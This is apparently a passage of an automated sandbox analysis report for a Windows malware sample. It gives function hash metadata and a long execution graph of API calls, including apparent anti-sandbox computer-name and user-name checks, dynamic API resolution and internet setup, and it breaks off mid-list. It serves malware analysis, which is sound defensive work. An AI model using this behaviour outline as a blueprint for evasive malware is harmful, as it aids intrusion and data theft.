                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 953222e1584cafdbef34c0849772685c7799ba2a58708774016e061935f8de5e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF01271545B509E83319F7A5481547FBE4BE19310794CE2EE1DEC3A11D734A404CB59
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003FD390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 003FD3BF
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 003FD3D4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                                                                  • String ID: LpB
                                                                                                                                                                                                                                                                                                  • API String ID: 3728558374-825029884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94587640906c9a53a8652821ec0945a3fc056fa5de4e47cf6661d2b417a03d3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: d7139637e0099990e2e7cdd268ea6dad843632d8042422520eb604d14d7b1d42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94587640906c9a53a8652821ec0945a3fc056fa5de4e47cf6661d2b417a03d3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE02B79D0420C76CB14EFA5D855AFE7768DF00304F40822FFF1692181EB34E6088AA7
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:6.2%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                  Signature Coverage:9.9%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:40
                                                                                                                                                                                                                                                                                                  execution_graph 58856 6c80c930 GetSystemInfo VirtualAlloc 58857 6c80c9a3 GetSystemInfo 58856->58857 58858 6c80c973 58856->58858 58860 6c80c9d0 58857->58860 58861 6c80c9b6 58857->58861 58872 6c82b320 5 API calls ___raise_securityfailure 58858->58872 58860->58858 58864 6c80c9d8 VirtualAlloc 58860->58864 58861->58860 58863 6c80c9bd 58861->58863 58862 6c80c99b 58863->58858 58865 6c80c9c1 VirtualFree 58863->58865 58866 6c80c9f0 58864->58866 58867 6c80c9ec 58864->58867 58865->58858 58873 6c82cbe8 GetCurrentProcess TerminateProcess 58866->58873 58867->58858 58872->58862 58874 418490 58875 41849b 58874->58875 58904 402860 58875->58904 58883 4184b4 59006 40fe20 58883->59006 58887 4184c6 59011 40ffe0 lstrlen 58887->59011 58890 40ffe0 3 API calls 58891 4184ee 58890->58891 58892 40ffe0 3 API calls 58891->58892 58893 4184f5 58892->58893 59015 40ff00 58893->59015 58895 4184fe 58896 41851e OpenEventA 58895->58896 58897 418530 CloseHandle Sleep 58896->58897 58898 41855c 58896->58898 59179 4100c0 58897->59179 58901 418565 CreateEventA 58898->58901 58900 41854a OpenEventA 58900->58897 58900->58898 59019 417c10 58901->59019 59180 402360 LocalAlloc 58904->59180 58906 402871 58907 402360 11 API calls 58906->58907 58908 402887 58907->58908 58909 402360 11 API calls 58908->58909 58910 40289d 58909->58910 58911 402360 11 API calls 58910->58911 58912 4028b3 58911->58912 58913 402360 11 API calls 58912->58913 58914 4028c9 58913->58914 58915 402360 11 API calls 58914->58915 58916 4028df 58915->58916 58917 402360 11 API calls 58916->58917 58918 4028f8 58917->58918 58919 402360 11 API calls 58918->58919 58920 40290e 58919->58920 58921 402360 11 API calls 58920->58921 58922 402924 58921->58922 58923 402360 11 API calls 58922->58923 58924 40293a 58923->58924 58925 402360 11 API calls 58924->58925 58926 402950 58925->58926 58927 402360 11 API calls 58926->58927 58928 402966 58927->58928 58929 402360 11 API calls 58928->58929 58930 40297f 58929->58930 58931 402360 11 API calls 58930->58931 58932 402995 58931->58932 58933 402360 11 API calls 58932->58933 58934 4029ab 58933->58934 58935 402360 11 API calls 58934->58935 58936 4029c1 58935->58936 58937 402360 11 API calls 58936->58937 58938 4029d7 58937->58938 58939 402360 11 API calls 58938->58939 58940 4029ed 58939->58940 58941 402360 11 API calls 58940->58941 58942 402a06 58941->58942 58943 402360 11 API calls 58942->58943 58944 402a1c 58943->58944 58945 402360 11 API calls 58944->58945 58946 402a32 58945->58946 58947 402360 11 API calls 58946->58947 58948 402a48 58947->58948 58949 402360 11 API calls 58948->58949 58950 402a5e 58949->58950 58951 402360 11 API calls 58950->58951 58952 402a74 58951->58952 58953 402360 11 API calls 58952->58953 58954 402a8d 58953->58954 58955 402360 11 API calls 58954->58955 58956 402aa3 58955->58956 58957 402360 11 API calls 58956->58957 58958 402ab9 58957->58958 58959 402360 11 API calls 58958->58959 58960 402acf 58959->58960 58961 402360 11 API calls 58960->58961 58962 402ae5 58961->58962 58963 402360 11 API calls 58962->58963 58964 402afb 58963->58964 58965 402360 11 API calls 58964->58965 58966 402b14 58965->58966 58967 402360 11 API calls 58966->58967 58968 402b2a 58967->58968 58969 402360 11 API calls 58968->58969 58970 402b40 58969->58970 58971 402360 11 API calls 58970->58971 58972 402b56 58971->58972 58973 402360 11 API calls 58972->58973 58974 402b6c 58973->58974 58975 402360 11 API calls 58974->58975 58976 402b82 58975->58976 58977 402360 11 API calls 58976->58977 58978 402b9b 58977->58978 58979 402360 11 API calls 58978->58979 58980 402bb1 58979->58980 58981 402360 11 API calls 58980->58981 58982 402bc7 58981->58982 58983 4185a0 LoadLibraryA 58982->58983 58984 4187c7 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 58983->58984 58985 4185b8 GetProcAddress 58983->58985 58986 418828 GetProcAddress 58984->58986 58987 41883b 58984->58987 58988 4185db 20 API calls 58985->58988 58986->58987 58989 418844 GetProcAddress GetProcAddress 58987->58989 58990 41886f 58987->58990 58988->58984 58989->58990 58991 418878 GetProcAddress 58990->58991 58992 41888b 58990->58992 58991->58992 58993 418894 GetProcAddress 58992->58993 58994 4188a7 58992->58994 58993->58994 58995 4188b0 GetProcAddress GetProcAddress 58994->58995 58996 4184aa 58994->58996 58995->58996 58997 401050 58996->58997 59184 410260 GetProcessHeap HeapAlloc GetComputerNameA 58997->59184 59000 401088 59005 401090 CreateDCA GetDeviceCaps ReleaseDC 59000->59005 59001 401068 59186 410220 GetProcessHeap HeapAlloc GetUserNameA 59001->59186 59003 401074 strcmp 59003->59000 59004 401081 ExitProcess 59003->59004 59005->58883 59007 40fe30 59006->59007 59008 40fe4f 59007->59008 59009 40fe47 lstrcpy 59007->59009 59010 410220 GetProcessHeap HeapAlloc GetUserNameA 59008->59010 59009->59008 59010->58887 59013 41002f 59011->59013 59012 410057 59012->58890 59013->59012 59014 410045 lstrcpy lstrcat 59013->59014 59014->59012 59017 40ff16 59015->59017 59016 40ff46 59016->58895 59017->59016 59018 40ff3e lstrcpy 59017->59018 59018->59016 59020 417c32 59019->59020 59021 40fe20 lstrcpy 59020->59021 59022 417c44 59021->59022 59187 40feb0 lstrlen 59022->59187 59025 40feb0 2 API calls 59026 417cba 59025->59026 59191 402bd0 59026->59191 59034 417d9d 59035 40ff00 lstrcpy 59034->59035 59036 417db2 59035->59036 59037 40ff00 lstrcpy 59036->59037 59038 417dc1 59037->59038 59039 40ff00 lstrcpy 59038->59039 59040 417dd0 59039->59040 59041 40ff00 lstrcpy 59040->59041 59042 417e0f 59041->59042 59043 40ff00 lstrcpy 59042->59043 59044 417e1e 59043->59044 59914 40fe60 59044->59914 59047 40ffe0 3 API calls 59048 417e4b 59047->59048 59049 40ff00 lstrcpy 59048->59049 59050 417e5b 59049->59050 59918 40ff50 59050->59918 59053 40ff00 lstrcpy 59054 417e93 59053->59054 59055 417eaf InternetOpenA 59054->59055 59922 4100c0 59055->59922 59057 417ec6 InternetOpenA 59058 40fe60 lstrcpy 59057->59058 59059 417ef0 59058->59059 59923 402450 59059->59923 59063 417f14 59064 40fe60 lstrcpy 59063->59064 59065 417f2c 59064->59065 59945 404500 59065->59945 59067 417f36 60082 4127a0 59067->60082 59069 417f3e 59070 40fe20 lstrcpy 59069->59070 59071 417f72 59070->59071 59072 401120 lstrcpy 59071->59072 59073 417f8a 59072->59073 60102 405ce0 59073->60102 59075 417f94 60282 412150 59075->60282 59077 417f9c 59078 40fe20 lstrcpy 59077->59078 59079 417fc4 59078->59079 59080 401120 lstrcpy 59079->59080 59081 417fdc 59080->59081 59082 405ce0 41 API calls 59081->59082 59083 417fe6 59082->59083 60290 411fa0 59083->60290 59085 417fee 59086 401120 lstrcpy 59085->59086 59087 418002 59086->59087 60301 415660 59087->60301 59089 418007 59090 40fe60 lstrcpy 59089->59090 59091 418018 59090->59091 59092 40fe20 lstrcpy 59091->59092 59093 418035 59092->59093 60647 404c00 59093->60647 59095 41803e 59096 401120 lstrcpy 59095->59096 59097 41807e 59096->59097 60668 40e920 59097->60668 59179->58900 59181 402387 59180->59181 59182 4023eb strlen strlen strlen strlen 59180->59182 59183 402392 6 API calls 59181->59183 59182->58906 59183->59182 59183->59183 59185 40105b strcmp 59184->59185 59185->59000 59185->59001 59186->59003 59189 40feca 59187->59189 59188 40fef8 59188->59025 59189->59188 59190 40fef0 lstrcpy 59189->59190 59190->59188 59192 402360 11 API calls 59191->59192 59193 402be1 59192->59193 59194 402360 11 API calls 59193->59194 59195 402bf7 59194->59195 59196 402360 11 API calls 59195->59196 59197 402c0d 59196->59197 59198 402360 11 API calls 59197->59198 59199 402c23 59198->59199 59200 402360 11 API calls 59199->59200 59201 402c39 59200->59201 59202 402360 11 API calls 59201->59202 59203 402c4f 59202->59203 59204 402360 11 API calls 59203->59204 59205 402c68 59204->59205 59206 402360 11 API calls 59205->59206 59207 402c7e 59206->59207 59208 402360 11 API calls 59207->59208 59209 402c94 59208->59209 59210 402360 11 API calls 59209->59210 59211 402caa 59210->59211 59212 402360 11 API calls 59211->59212 59213 402cc0 59212->59213 59214 402360 11 API calls 59213->59214 59215 402cd6 59214->59215 59216 402360 11 API calls 59215->59216 59217 402cef 59216->59217 59218 402360 11 API calls 59217->59218 59219 402d05 59218->59219 59220 402360 11 API calls 59219->59220 59221 402d1b 59220->59221 59222 402360 11 API calls 59221->59222 59223 402d31 59222->59223 59224 402360 11 API calls 59223->59224 59225 402d47 59224->59225 59226 402360 11 API calls 59225->59226 59227 402d5d 59226->59227 59228 402360 11 API calls 59227->59228 59229 402d76 59228->59229 59230 402360 11 API calls 59229->59230 59231 402d8c 59230->59231 59232 402360 11 API calls 59231->59232 59233 402da2 59232->59233 59234 402360 11 API calls 59233->59234 59235 402db8 59234->59235 59236 402360 11 API calls 59235->59236 59237 402dce 59236->59237 59238 402360 11 API calls 59237->59238 59239 402de4 59238->59239 59240 402360 11 API calls 59239->59240 59241 402dfd 59240->59241 59242 402360 11 API calls 59241->59242 59243 402e13 59242->59243 59244 402360 11 API calls 59243->59244 59245 402e29 59244->59245 59246 402360 11 API calls 59245->59246 59247 402e3f 59246->59247 59248 402360 11 API calls 59247->59248 59249 402e55 59248->59249 59250 402360 11 API calls 59249->59250 59251 402e6b 59250->59251 59252 402360 11 API calls 59251->59252 59253 402e84 59252->59253 59254 402360 11 API calls 59253->59254 59255 402e9a 59254->59255 59256 402360 11 API calls 59255->59256 59257 402eb0 59256->59257 59258 402360 11 API calls 59257->59258 59259 402ec6 59258->59259 59260 402360 11 API calls 59259->59260 59261 402edc 59260->59261 59262 402360 11 API calls 59261->59262 59263 402ef2 59262->59263 59264 402360 11 API calls 59263->59264 59265 402f0b 59264->59265 59266 402360 11 API calls 59265->59266 59267 402f21 59266->59267 59268 402360 11 API calls 59267->59268 59269 402f37 59268->59269 59270 402360 11 API calls 59269->59270 59271 402f4d 59270->59271 59272 402360 11 API calls 59271->59272 59273 402f63 59272->59273 59274 402360 11 API calls 59273->59274 59275 402f79 59274->59275 59276 402360 11 API calls 59275->59276 59277 402f92 59276->59277 59278 402360 11 API calls 59277->59278 59279 402fa8 59278->59279 59280 402360 11 API calls 59279->59280 59281 402fbe 59280->59281 59282 402360 11 API calls 59281->59282 59283 402fd4 59282->59283 59284 402360 11 API calls 59283->59284 59285 402fea 59284->59285 59286 402360 11 API calls 59285->59286 59287 403000 59286->59287 59288 402360 11 API calls 59287->59288 59289 403019 59288->59289 59290 402360 11 API calls 59289->59290 59291 40302f 59290->59291 59292 402360 11 API calls 59291->59292 59293 403045 59292->59293 59294 402360 11 API calls 59293->59294 59295 40305b 59294->59295 59296 402360 11 API calls 59295->59296 59297 403071 59296->59297 59298 402360 11 API calls 59297->59298 59299 403087 59298->59299 59300 402360 11 API calls 59299->59300 59301 4030a0 59300->59301 59302 402360 11 API calls 59301->59302 59303 4030b6 59302->59303 59304 402360 11 API calls 59303->59304 59305 4030cc 59304->59305 59306 402360 11 API calls 59305->59306 59307 4030e2 59306->59307 59308 402360 11 API calls 59307->59308 59309 4030f8 59308->59309 59310 402360 11 API calls 59309->59310 59311 40310e 59310->59311 59312 402360 11 API calls 59311->59312 59313 403127 59312->59313 59314 402360 11 API calls 59313->59314 59315 40313d 59314->59315 59316 402360 11 API calls 59315->59316 59317 403153 59316->59317 59318 402360 11 API calls 59317->59318 59319 403169 59318->59319 59320 402360 11 API calls 59319->59320 59321 40317f 59320->59321 59322 402360 11 API calls 59321->59322 59323 403195 59322->59323 59324 402360 11 API calls 59323->59324 59325 4031ae 59324->59325 59326 402360 11 API calls 59325->59326 59327 4031c4 59326->59327 59328 402360 11 API calls 59327->59328 59329 4031da 59328->59329 59330 402360 11 API calls 59329->59330 59331 4031f0 59330->59331 59332 402360 11 API calls 59331->59332 59333 403206 59332->59333 59334 402360 11 API calls 59333->59334 59335 40321c 59334->59335 59336 402360 11 API calls 59335->59336 59337 403235 59336->59337 59338 402360 11 API calls 59337->59338 59339 40324b 59338->59339 59340 402360 11 API calls 59339->59340 59341 403261 59340->59341 59342 402360 11 API calls 59341->59342 59343 403277 59342->59343 59344 402360 11 API calls 59343->59344 59345 40328d 59344->59345 59346 402360 11 API calls 59345->59346 59347 4032a3 59346->59347 59348 402360 11 API calls 59347->59348 59349 4032bc 59348->59349 59350 402360 11 API calls 59349->59350 59351 4032d2 59350->59351 59352 402360 11 API calls 59351->59352 59353 4032e8 59352->59353 59354 402360 11 API calls 59353->59354 59355 4032fe 59354->59355 59356 402360 11 API calls 59355->59356 59357 403314 59356->59357 59358 402360 11 API calls 59357->59358 59359 40332a 59358->59359 59360 402360 11 API calls 59359->59360 59361 403343 59360->59361 59362 402360 11 API calls 59361->59362 59363 403359 59362->59363 59364 402360 11 API calls 59363->59364 59365 40336f 59364->59365 59366 402360 11 API calls 59365->59366 59367 403385 59366->59367 59368 402360 11 API calls 59367->59368 59369 40339b 59368->59369 59370 402360 11 API calls 59369->59370 59371 4033b1 59370->59371 59372 402360 11 API calls 59371->59372 59373 4033ca 59372->59373 59374 402360 11 API calls 59373->59374 59375 4033e0 59374->59375 59376 402360 11 API calls 59375->59376 59377 4033f6 59376->59377 59378 402360 11 API calls 59377->59378 59379 40340c 59378->59379 59380 402360 11 API calls 59379->59380 59381 403422 59380->59381 59382 402360 11 API calls 59381->59382 59383 403438 59382->59383 59384 402360 11 API calls 59383->59384 59385 403451 59384->59385 59386 402360 11 API calls 59385->59386 59387 403467 59386->59387 59388 402360 11 API calls 59387->59388 59389 40347d 59388->59389 59390 402360 11 API calls 59389->59390 59391 403493 59390->59391 59392 402360 11 API calls 59391->59392 59393 4034a9 59392->59393 59394 402360 11 API calls 59393->59394 59395 4034bf 59394->59395 59396 402360 11 API calls 59395->59396 59397 4034d8 59396->59397 59398 402360 11 API calls 59397->59398 59399 4034ee 59398->59399 59400 402360 11 API calls 59399->59400 59401 403504 59400->59401 59402 402360 11 API calls 59401->59402 59403 40351a 59402->59403 59404 402360 11 API calls 59403->59404 59405 403530 59404->59405 59406 402360 11 API calls 59405->59406 59407 403546 59406->59407 59408 402360 11 API calls 59407->59408 59409 40355f 59408->59409 59410 402360 11 API calls 59409->59410 59411 403575 59410->59411 59412 402360 11 API calls 59411->59412 59413 40358b 59412->59413 59414 402360 11 API calls 59413->59414 59415 4035a1 59414->59415 59416 402360 11 API calls 59415->59416 59417 4035b7 59416->59417 59418 402360 11 API calls 59417->59418 59419 4035cd 59418->59419 59420 402360 11 API calls 59419->59420 59421 4035e6 59420->59421 59422 402360 11 API calls 59421->59422 59423 4035fc 59422->59423 59424 402360 11 API calls 59423->59424 59425 403612 59424->59425 59426 402360 11 API calls 59425->59426 59427 403628 59426->59427 59428 402360 11 API calls 59427->59428 59429 40363e 59428->59429 59430 402360 11 API calls 59429->59430 59431 403654 59430->59431 59432 402360 11 API calls 59431->59432 59433 40366d 59432->59433 59434 402360 11 API calls 59433->59434 59435 403683 59434->59435 59436 402360 11 API calls 59435->59436 59437 403699 59436->59437 59438 402360 11 API calls 59437->59438 59439 4036af 59438->59439 59440 402360 11 API calls 59439->59440 59441 4036c5 59440->59441 59442 402360 11 API calls 59441->59442 59443 4036db 59442->59443 59444 402360 11 API calls 59443->59444 59445 4036f4 59444->59445 59446 402360 11 API calls 59445->59446 59447 40370a 59446->59447 59448 402360 11 API calls 59447->59448 59449 403720 59448->59449 59450 402360 11 API calls 59449->59450 59451 403736 59450->59451 59452 402360 11 API calls 59451->59452 59453 40374c 59452->59453 59454 402360 11 API calls 59453->59454 59455 403762 59454->59455 59456 402360 11 API calls 59455->59456 59457 40377b 59456->59457 59458 402360 11 API calls 59457->59458 59459 403791 59458->59459 59460 402360 11 API calls 59459->59460 59461 4037a7 59460->59461 59462 402360 11 API calls 59461->59462 59463 4037bd 59462->59463 59464 402360 11 API calls 59463->59464 59465 4037d3 59464->59465 59466 402360 11 API calls 59465->59466 59467 4037e9 59466->59467 59468 402360 11 API calls 59467->59468 59469 403802 59468->59469 59470 402360 11 API calls 59469->59470 59471 403818 59470->59471 59472 402360 11 API calls 59471->59472 59473 40382e 59472->59473 59474 402360 11 API calls 59473->59474 59475 403844 59474->59475 59476 402360 11 API calls 59475->59476 59477 40385a 59476->59477 59478 402360 11 API calls 59477->59478 59479 403870 59478->59479 59480 402360 11 API calls 59479->59480 59481 403889 59480->59481 59482 402360 11 API calls 59481->59482 59483 40389f 59482->59483 59484 402360 11 API calls 59483->59484 59485 4038b5 59484->59485 59486 402360 11 API calls 59485->59486 59487 4038cb 59486->59487 59488 402360 11 API calls 59487->59488 59489 4038e1 59488->59489 59490 402360 11 API calls 59489->59490 59491 4038f7 59490->59491 59492 402360 11 API calls 59491->59492 59493 403910 59492->59493 59494 402360 11 API calls 59493->59494 59495 403926 59494->59495 59496 402360 11 API calls 59495->59496 59497 40393c 59496->59497 59498 402360 11 API calls 59497->59498 59499 403952 59498->59499 59500 402360 11 API calls 59499->59500 59501 403968 59500->59501 59502 402360 11 API calls 59501->59502 59503 40397e 59502->59503 59504 402360 11 API calls 59503->59504 59505 403997 59504->59505 59506 402360 11 API calls 59505->59506 59507 4039ad 59506->59507 59508 402360 11 API calls 59507->59508 59509 4039c3 59508->59509 59510 402360 11 API calls 59509->59510 59511 4039d9 59510->59511 59512 402360 11 API calls 59511->59512 59513 4039ef 59512->59513 59514 402360 11 API calls 59513->59514 59515 403a05 59514->59515 59516 402360 11 API calls 59515->59516 59517 403a1e 59516->59517 59518 402360 11 API calls 59517->59518 59519 403a34 59518->59519 59520 402360 11 API calls 59519->59520 59521 403a4a 59520->59521 59522 402360 11 API calls 59521->59522 59523 403a60 59522->59523 59524 402360 11 API calls 59523->59524 59525 403a76 59524->59525 59526 402360 11 API calls 59525->59526 59527 403a8c 59526->59527 59528 402360 11 API calls 59527->59528 59529 403aa5 59528->59529 59530 402360 11 API calls 59529->59530 59531 403abb 59530->59531 59532 402360 11 API calls 59531->59532 59533 403ad1 59532->59533 59534 402360 11 API calls 59533->59534 59535 403ae7 59534->59535 59536 402360 11 API calls 59535->59536 59537 403afd 59536->59537 59538 402360 11 API calls 59537->59538 59539 403b13 59538->59539 59540 402360 11 API calls 59539->59540 59541 403b2c 59540->59541 59542 402360 11 API calls 59541->59542 59543 403b42 59542->59543 59544 402360 11 API calls 59543->59544 59545 403b58 59544->59545 59546 402360 11 API calls 59545->59546 59547 403b6e 59546->59547 59548 402360 11 API calls 59547->59548 59549 403b84 59548->59549 59550 402360 11 API calls 59549->59550 59551 403b9a 59550->59551 59552 402360 11 API calls 59551->59552 59553 403bb3 59552->59553 59554 402360 11 API calls 59553->59554 59555 403bc9 59554->59555 59556 402360 11 API calls 59555->59556 59557 403bdf 59556->59557 59558 402360 11 API calls 59557->59558 59559 403bf5 59558->59559 59560 402360 11 API calls 59559->59560 59561 403c0b 59560->59561 59562 402360 11 API calls 59561->59562 59563 403c21 59562->59563 59564 402360 11 API calls 59563->59564 59565 403c3a 59564->59565 59566 402360 11 API calls 59565->59566 59567 403c50 59566->59567 59568 402360 11 API calls 59567->59568 59569 403c66 59568->59569 59570 402360 11 API calls 59569->59570 59571 403c7c 59570->59571 59572 402360 11 API calls 59571->59572 59573 403c92 59572->59573 59574 402360 11 API calls 59573->59574 59575 403ca8 59574->59575 59576 402360 11 API calls 59575->59576 59577 403cc1 59576->59577 59578 402360 11 API calls 59577->59578 59579 403cd7 59578->59579 59580 402360 11 API calls 59579->59580 59581 403ced 59580->59581 59582 402360 11 API calls 59581->59582 59583 403d03 59582->59583 59584 402360 11 API calls 59583->59584 59585 403d19 59584->59585 59586 402360 11 API calls 59585->59586 59587 403d2f 59586->59587 59588 402360 11 API calls 59587->59588 59589 403d48 59588->59589 59590 402360 11 API calls 59589->59590 59591 403d5e 59590->59591 59592 402360 11 API calls 59591->59592 59593 403d74 59592->59593 59594 402360 11 API calls 59593->59594 59595 403d8a 59594->59595 59596 402360 11 API calls 59595->59596 59597 403da0 59596->59597 59598 402360 11 API calls 59597->59598 59599 403db6 59598->59599 59600 402360 11 API calls 59599->59600 59601 403dcf 59600->59601 59602 402360 11 API calls 59601->59602 59603 403de5 59602->59603 59604 402360 11 API calls 59603->59604 59605 403dfb 59604->59605 59606 402360 11 API calls 59605->59606 59607 403e11 59606->59607 59608 402360 11 API calls 59607->59608 59609 403e27 59608->59609 59610 402360 11 API calls 59609->59610 59611 403e3d 59610->59611 59612 402360 11 API calls 59611->59612 59613 403e56 59612->59613 59614 402360 11 API calls 59613->59614 59615 403e6c 59614->59615 59616 402360 11 API calls 59615->59616 59617 403e82 59616->59617 59618 402360 11 API calls 59617->59618 59619 403e98 59618->59619 59620 402360 11 API calls 59619->59620 59621 403eae 59620->59621 59622 402360 11 API calls 59621->59622 59623 403ec4 59622->59623 59624 402360 11 API calls 59623->59624 59625 403edd 59624->59625 59626 402360 11 API calls 59625->59626 59627 403ef3 59626->59627 59628 402360 11 API calls 59627->59628 59629 403f09 59628->59629 59630 402360 11 API calls 59629->59630 59631 403f1f 59630->59631 59632 402360 11 API calls 59631->59632 59633 403f35 59632->59633 59634 402360 11 API calls 59633->59634 59635 403f4b 59634->59635 59636 402360 11 API calls 59635->59636 59637 403f64 59636->59637 59638 402360 11 API calls 59637->59638 59639 403f7a 59638->59639 59640 402360 11 API calls 59639->59640 59641 403f90 59640->59641 59642 402360 11 API calls 59641->59642 59643 403fa6 59642->59643 59644 402360 11 API calls 59643->59644 59645 403fbc 59644->59645 59646 402360 11 API calls 59645->59646 59647 403fd2 59646->59647 59648 402360 11 API calls 59647->59648 59649 403feb 59648->59649 59650 402360 11 API calls 59649->59650 59651 404001 59650->59651 59652 402360 11 API calls 59651->59652 59653 404017 59652->59653 59654 402360 11 API calls 59653->59654 59655 40402d 59654->59655 59656 402360 11 API calls 59655->59656 59657 404043 59656->59657 59658 402360 11 API calls 59657->59658 59659 404059 59658->59659 59660 402360 11 API calls 59659->59660 59661 404072 59660->59661 59662 402360 11 API calls 59661->59662 59663 404088 59662->59663 59664 402360 11 API calls 59663->59664 59665 40409e 59664->59665 59666 402360 11 API calls 59665->59666 59667 4040b4 59666->59667 59668 402360 11 API calls 59667->59668 59669 4040ca 59668->59669 59670 402360 11 API calls 59669->59670 59671 4040e0 59670->59671 59672 402360 11 API calls 59671->59672 59673 4040f9 59672->59673 59674 402360 11 API calls 59673->59674 59675 40410f 59674->59675 59676 402360 11 API calls 59675->59676 59677 404125 59676->59677 59678 402360 11 API calls 59677->59678 59679 40413b 59678->59679 59680 402360 11 API calls 59679->59680 59681 404151 59680->59681 59682 402360 11 API calls 59681->59682 59683 404167 59682->59683 59684 402360 11 API calls 59683->59684 59685 404180 59684->59685 59686 402360 11 API calls 59685->59686 59687 404196 59686->59687 59688 402360 11 API calls 59687->59688 59689 4041ac 59688->59689 59690 402360 11 API calls 59689->59690 59691 4041c2 59690->59691 59692 402360 11 API calls 59691->59692 59693 4041d8 59692->59693 59694 402360 11 API calls 59693->59694 59695 4041ee 59694->59695 59696 402360 11 API calls 59695->59696 59697 404207 59696->59697 59698 402360 11 API calls 59697->59698 59699 40421d 59698->59699 59700 402360 11 API calls 59699->59700 59701 404233 59700->59701 59702 402360 11 API calls 59701->59702 59703 404249 59702->59703 59704 402360 11 API calls 59703->59704 59705 40425f 59704->59705 59706 402360 11 API calls 59705->59706 59707 404275 59706->59707 59708 402360 11 API calls 59707->59708 59709 40428e 59708->59709 59710 402360 11 API calls 59709->59710 59711 4042a4 59710->59711 59712 402360 11 API calls 59711->59712 59713 4042ba 59712->59713 59714 402360 11 API calls 59713->59714 59715 4042d0 59714->59715 59716 402360 11 API calls 59715->59716 59717 4042e6 59716->59717 59718 402360 11 API calls 59717->59718 59719 4042fc 59718->59719 59720 402360 11 API calls 59719->59720 59721 404315 59720->59721 59722 402360 11 API calls 59721->59722 59723 40432b 59722->59723 59724 402360 11 API calls 59723->59724 59725 404341 59724->59725 59726 402360 11 API calls 59725->59726 59727 404357 59726->59727 59728 402360 11 API calls 59727->59728 59729 40436d 59728->59729 59730 402360 11 API calls 59729->59730 59731 404383 59730->59731 59732 402360 11 API calls 59731->59732 59733 40439c 59732->59733 59734 402360 11 API calls 59733->59734 59735 4043b2 59734->59735 59736 402360 11 API calls 59735->59736 59737 4043c8 59736->59737 59738 402360 11 API calls 59737->59738 59739 4043de 59738->59739 59740 402360 11 API calls 59739->59740 59741 4043f4 59740->59741 59742 402360 11 API calls 59741->59742 59743 40440a 59742->59743 59744 402360 11 API calls 59743->59744 59745 404423 59744->59745 59746 4188e0 59745->59746 59747 4188ed 43 API calls 59746->59747 59748 418cfe 9 API calls 59746->59748 59747->59748 59749 418da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59748->59749 59750 418e18 59748->59750 59749->59750 59751 418ee2 59750->59751 59752 418e25 8 API calls 59750->59752 59753 418eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59751->59753 59754 418f5f 59751->59754 59752->59751 59753->59754 59755 418ff9 59754->59755 59756 418f6c 6 API calls 59754->59756 59757 419006 9 API calls 59755->59757 59758 4190dc 59755->59758 59756->59755 59757->59758 59759 4190e5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59758->59759 59760 419159 59758->59760 59759->59760 59761 419162 GetProcAddress GetProcAddress 59760->59761 59762 41918d 59760->59762 59761->59762 59763 4191c1 59762->59763 59764 419196 GetProcAddress GetProcAddress 59762->59764 59765 4192b9 59763->59765 59766 4191ce 10 API calls 59763->59766 59764->59763 59767 4192c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59765->59767 59768 41931e 59765->59768 59766->59765 59767->59768 59769 419327 GetProcAddress 59768->59769 59770 41933a 59768->59770 59769->59770 59771 419343 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59770->59771 59772 41939f 59770->59772 59771->59772 59773 417d7d 59772->59773 59774 4193a8 GetProcAddress 59772->59774 59775 401120 59773->59775 59774->59773 59776 40fe60 lstrcpy 59775->59776 59777 401149 59776->59777 59778 40fe60 lstrcpy 59777->59778 59779 40115c 59778->59779 59780 40fe60 lstrcpy 59779->59780 59781 401178 59780->59781 59782 414330 59781->59782 59783 